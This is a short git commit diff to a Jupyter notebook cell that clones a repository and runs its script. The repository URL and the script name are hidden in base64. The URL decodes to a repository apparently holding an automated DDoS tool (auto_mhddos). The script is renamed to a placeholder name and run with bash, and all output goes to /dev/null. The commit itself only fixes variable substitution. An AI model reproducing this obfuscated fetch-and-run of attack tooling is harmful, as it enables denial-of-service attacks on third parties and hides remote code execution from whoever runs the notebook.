using {} in name var

--- a/main.ipynb
+++ b/main.ipynb
@@ -24,9 +24,9 @@
    "source": [
     "%cd ~\n",
     "name=\"@placeholder@\"\n",
-    "%rm -rf name  &> /dev/null\n",
-    "!git clone -n $(echo aHR0cHM6Ly9naXRodWIuY29tL3doaXRlLXNhZ2l0dGFyaXVzL2F1dG9fbWhkZG9zLmdpdAo= | base64 --decode) --depth 1 name  &> /dev/null\n",
-    "%cd name\n",
+    "%rm -rf {name}  &> /dev/null\n",
+    "!git clone -n $(echo aHR0cHM6Ly9naXRodWIuY29tL3doaXRlLXNhZ2l0dGFyaXVzL2F1dG9fbWhkZG9zLmdpdAo= | base64 --decode) --depth 1 {name}  &> /dev/null\n",
+    "%cd {name}\n",
     "!git checkout HEAD $(echo cnVubmVyLnNoCg== | base64 --decode)  &> /dev/null\n",
     "!mv $(echo cnVubmVyLnNoCg== | base64 --decode) {name}.sh  &> /dev/null\n",
     "!bash {name}.sh"
